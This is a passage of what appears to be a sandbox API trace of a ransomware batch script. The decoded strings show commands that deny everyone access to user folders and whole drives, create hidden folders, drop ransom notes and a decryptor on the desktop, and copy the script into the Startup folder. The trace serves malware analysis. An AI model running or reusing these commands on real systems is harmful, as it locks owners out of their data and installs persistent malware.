| out: lpDistanceToMoveHigh=0x0) returned 0x39e [0075.906] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0075.906] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0075.906] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.906] GetFileType (hFile=0x34c) returned 0x1 [0075.906] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0075.906] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.906] SetFilePointer (in: hFile=0x34c, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0075.906] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0075.906] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0075.906] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.906] GetFileType (hFile=0x34c) returned 0x1 [0075.907] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0075.907] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.907] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0075.907] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0075.907] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0075.907] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.907] GetFileType (hFile=0x34c) returned 0x1 [0075.907] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0075.907] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.907] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0075.907] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0075.907] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0075.907] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.907] GetFileType (hFile=0x34c) returned 0x1 [0075.907] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0075.907] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.907] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0075.907] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0075.907] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0075.907] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.907] GetFileType (hFile=0x34c) returned 0x1 [0075.907] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0075.907] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.907] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0075.907] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0075.907] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0075.907] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.907] GetFileType (hFile=0x34c) returned 0x1 [0075.907] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0075.907] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.908] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0075.908] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0075.908] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0075.908] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.908] GetFileType (hFile=0x34c) returned 0x1 [0075.908] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0075.908] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.908] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0075.908] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0075.908] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0075.908] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.908] GetFileType (hFile=0x34c) returned 0x1 [0075.908] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0075.908] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.908] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0075.908] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0075.908] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0075.908] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.908] GetFileType (hFile=0x34c) returned 0x1 [0075.908] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0075.908] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.908] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0075.908] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0075.908] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0075.908] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.908] GetFileType (hFile=0x34c) returned 0x1 [0075.908] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0075.908] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.908] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0075.908] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0075.909] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0075.909] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.909] GetFileType (hFile=0x34c) returned 0x1 [0075.909] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0075.909] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.909] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0075.909] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0075.909] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0075.909] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.909] GetFileType (hFile=0x34c) returned 0x1 [0075.909] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0075.909] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.909] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0075.909] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0075.909] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0075.909] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.909] GetFileType (hFile=0x34c) returned 0x1 [0075.909] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0075.909] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.909] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0075.909] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0075.909] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0075.909] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.909] GetFileType (hFile=0x34c) returned 0x1 [0075.909] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0075.909] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.909] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0075.909] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0075.909] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0075.909] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.909] GetFileType (hFile=0x34c) returned 0x1 [0075.910] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0075.910] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.910] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0075.910] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0075.910] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0075.910] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.910] GetFileType (hFile=0x34c) returned 0x1 [0075.910] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0075.910] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.910] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0075.910] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0075.910] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0075.910] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.910] GetFileType (hFile=0x34c) returned 0x1 [0075.910] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0075.910] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.910] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0075.910] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0075.910] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0075.910] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.910] GetFileType (hFile=0x34c) returned 0x1 [0075.910] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0075.910] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.910] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0075.910] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0075.910] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0075.910] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.910] GetFileType (hFile=0x34c) returned 0x1 [0075.910] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0075.910] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.911] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0075.911] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0075.911] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0075.911] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.911] GetFileType (hFile=0x34c) returned 0x1 [0075.911] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0075.911] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.911] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0075.911] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0075.911] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0075.911] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.911] GetFileType (hFile=0x34c) returned 0x1 [0075.911] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0075.911] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.911] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0075.911] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0075.911] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0075.911] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.911] GetFileType (hFile=0x34c) returned 0x1 [0075.911] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0075.911] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.911] SetFilePointer (in: hFile=0x34c, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0075.911] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0075.911] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0075.911] _get_osfhandle (_FileHandle=3) returned 0x34c [0075.911] GetFileType (hFile=0x34c) returned 0x1 [0075.911] SetFilePointer (in: hFile=0x34c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0075.911] ReadFile (in: hFile=0x34c, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0075.911] SetFilePointer (in: hFile=0x34c, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0075.911] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 